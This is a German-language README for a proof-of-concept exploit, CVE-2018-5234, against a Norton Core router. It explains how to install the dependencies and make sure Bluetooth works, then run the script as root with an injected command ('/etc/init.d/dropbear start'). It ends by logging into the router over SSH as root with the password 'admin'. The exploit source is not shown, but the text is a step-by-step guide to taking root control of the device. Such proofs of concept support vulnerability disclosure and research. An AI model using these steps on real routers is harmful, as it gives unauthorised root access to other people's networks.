
PoC-Exploit für CVE-2018-5234
Weitere Informationen finden Sie im Paper.
Zur Demonstration der Ausnutzung verwenden wir:
Um das Skript verwenden zu können, müssen wir zunächst alle Abhängigkeiten einrichten:
$ pip install -r ./requirements.txt
Mit Hilfe der BlueZ-Dienstprogramme sollten wir sicherstellen, dass Bluetooth aktiviert ist und
einwandfrei funktioniert.
Starten Sie den Router neu, um Zugriff auf die Engineering-Seite zu erhalten.
Starten Sie den PoC im Namen des Root-Benutzers (erforderlich für die Arbeit mit Bluetooth) mit dem auszuführenden Befehl als Argument:
$ ./ble_norton_core.py "/etc/init.d/dropbear start"
Nachdem das Skript erfolgreich ausgeführt wurde, erhalten wir Zugriff auf das Gerät über
die SSH-Verbindung. Wir setzen root als Benutzer und admin als Passwort:
$ ssh [email protected]